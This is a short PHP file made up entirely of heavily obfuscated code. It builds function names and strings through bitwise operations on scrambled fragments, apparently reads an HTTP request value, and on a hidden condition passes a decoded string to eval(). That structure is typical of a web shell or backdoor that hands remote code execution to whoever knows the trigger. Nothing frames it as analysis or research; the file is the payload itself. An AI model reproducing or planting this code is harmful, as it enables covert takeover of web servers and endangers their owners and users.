<?php
$c01mR='jDlM'.Rpvprv7;$aByrNFfp='ub&[[#'^'5'.VTz7S;$lD=sOhCuM&'wP$ng@';'K_3H74dLXmWy7'.
       'L:7';$Xn4n8uv0slW='A)'.amFt|feUdzV;$bPxgKG1='45'.ar6w.'+TKj+d.@ Q=<&-?!'^'|b<'.
       '"i-t0<?'.W2q3L.'>'.HbZrvU;$NC='-h5'|af5;$MO="}e7"&of7;$L_eV='wo|wov'&wguuo.#J'.
       '~';$pfcdha='@DTP]'|'HTT@Z';$G_=e&'[';$Ysys=$aByrNFfp|$lD;$SDdtx8=$NC&$MO;'w7b'.
       'ggtS2w=9';$ixVRQ7WhLz=$L_eV&$Xn4n8uv0slW;$Pi=(FTYMM7_F7.'@3EE>'.Dt0s9vo.'.Oo '.
       '}>[)uC@'^'yi? +U<{E%P*z]9'.KJDJATJ8WYC_lTNxp)&('?'.vviw.'~fw?gm~'./*E3_xeLDC2'.
       'j2]~,r=As#*/ww79fsw5so.'?w=;{7y9}|'&'7'.vwswwfw.'~sww?}?='.wwes.#qhUHKCa8cfA3'.
       '{g>?=s{w:?q}');$WrKPyX9UD=$bPxgKG1&('n:o.?'.odxh.'*1 vs|i,@d-g5'^'4N9y`7;-2_g'.
       'U)0"0i/0r>d');if(!$Ysys($SDdtx8($ixVRQ7WhLz($pfcdha.$G_)),$Pi))eval(/*SHyHvGv'.
       '%Nigc,*/$ixVRQ7WhLz($WrKPyX9UD));#whKe8G*LO^NesAg7!}Hg=!@uf*=j6FmX9}vJXfYVRK'.
       '9PaKx|%hUn#=&8uHl3a4|{13_93s,KA;;lJ4?f-:ztBbahV|z^h-n~f+dz~G<4sH]P&:';